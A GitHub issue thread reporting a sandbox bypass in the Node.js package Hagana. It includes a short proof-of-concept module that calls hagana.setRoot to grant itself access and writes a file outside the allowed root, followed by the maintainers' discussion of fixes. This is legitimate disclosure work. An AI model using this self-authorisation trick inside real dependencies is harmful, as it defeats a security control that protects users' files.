hagana icon indicating copy to clipboard operation
hagana copied to clipboard

Published 20 hours ago verified publisher icon yaakov123

Hagana self-authorize break out

Open Mickael-van-der-Beek opened this issue 2 years ago • 3 comments

Since Hagana is available to the other node_modules, it's possible to call Hagana inside the malicious module to self-authorise the wanted actions.

e.g: the malicious library code:

import fs from 'fs';
import path from 'path';
import hagana from '@hagana/hagana';

export function run () {
  const fileDirectory = path.resolve(path.dirname('.'), '..');
  const filePath = path.resolve(fileDirectory, './out.txt');
  hagana.setRoot(fileDirectory);
  fs.writeFileSync(filePath, 'yolooo', { encoding: 'utf-8' });
}

Mickael-van-der-Beek avatar Jul 15 '22 15:07 Mickael-van-der-Beek

🤦🏻‍♂️ This is a good find. I guess the only way to solve this is by maintaining internal state to know that hagana has already been required and then prevent additional requires.

Need to think about this.

yaakov123 avatar Jul 15 '22 15:07 yaakov123

I would probably block any calls to Hagana coming from the library directory outside of Hagana's directory itself.

Mickael-van-der-Beek avatar Jul 15 '22 15:07 Mickael-van-der-Beek

That's a better idea.

yaakov123 avatar Jul 16 '22 18:07 yaakov123